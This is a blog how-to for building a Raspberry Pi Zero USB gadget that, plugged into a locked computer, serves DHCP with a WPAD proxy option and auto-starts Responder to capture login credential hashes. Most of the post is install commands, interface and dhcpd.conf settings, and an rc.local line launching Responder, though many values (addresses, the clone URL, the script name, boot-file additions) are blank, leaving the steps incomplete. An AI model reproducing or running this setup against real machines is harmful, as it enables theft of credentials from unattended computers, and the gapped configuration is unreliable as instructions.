Snagging Credentials from Locked Machines with Raspberry Pi Zero

I get really excited anytime I get to use my Raspberry Pi Zero. When I saw Rob Fuller’s Tweet this morning (@mubix), I got really excited. Coincidentally I had a thing for single board computers and been playing with the USB Gadget mode for the Pi Zero the last couple of weeks. As soon as I saw the tweet, I knew I have to do this with the Pi Zero.


This is a proof of concept. Please think before you apply this in the real world.


Any actions and or activities related to the material contained within this website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and elevatedprompt will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.




  1. RaspberryPi Zero
  2. 4GB or larger Micro SD Card
  3. OTG USB Cable
  4. USB Ethernet adapter or WiFi Dongle (initial setup)

I am going to assume that the reader knows how to flash an image onto the SD Card. I went with the Raspbian-lite version as its better with RAM utilization on the Pi. Boot up the Raspberry Pi Zero and install the software required:

sudo apt-get install -y python git python-pip python-dev screen sqlite3 isc-dhcp-server
sudo pip install pycrypto
sudo su
cd ~/
git clone


Open /etc/network/interfaces with your favorite text editor and add the following to it:

auto usb0
allow-hotplug usb0
iface usb0 inet static



Edit /etc/dhcp/dhcpd.conf and replace the contents with the text below:

ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet netmask {
option routers;
option local-proxy-config "";


Edit /etc/rc.local and add the following before exit 0:

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
# Start DHCP server
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python -I usb0 -f -w -r -d -F'


sudo su; nano ~/.screenrc and add this:
# Logging
deflog on
logfile /root/logs/screenlog_$-- USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

Once the above steps are completed, shutdown the Pi Zero (shutdown -h now) and remove the Micro SD Card. Connect the Micro SD card to your computer. We will need to modify config.txt and cmdline.txt to turn the OTG port to a virtual Ethernet port. Please ensure that you are running a version of Raspbian released after May 2016



Add this after the last line:



After rootwait (the last word on the first line) add a space and then


2017-03-19T03:26:04+00:00Categories: How To's|

Leave A Comment

Come by our booth March 13 & 14, 2017 at BSides Vancouver, a two-day, high-caliber gathering for information security professionals, hackers, coders and the greater tech community. link to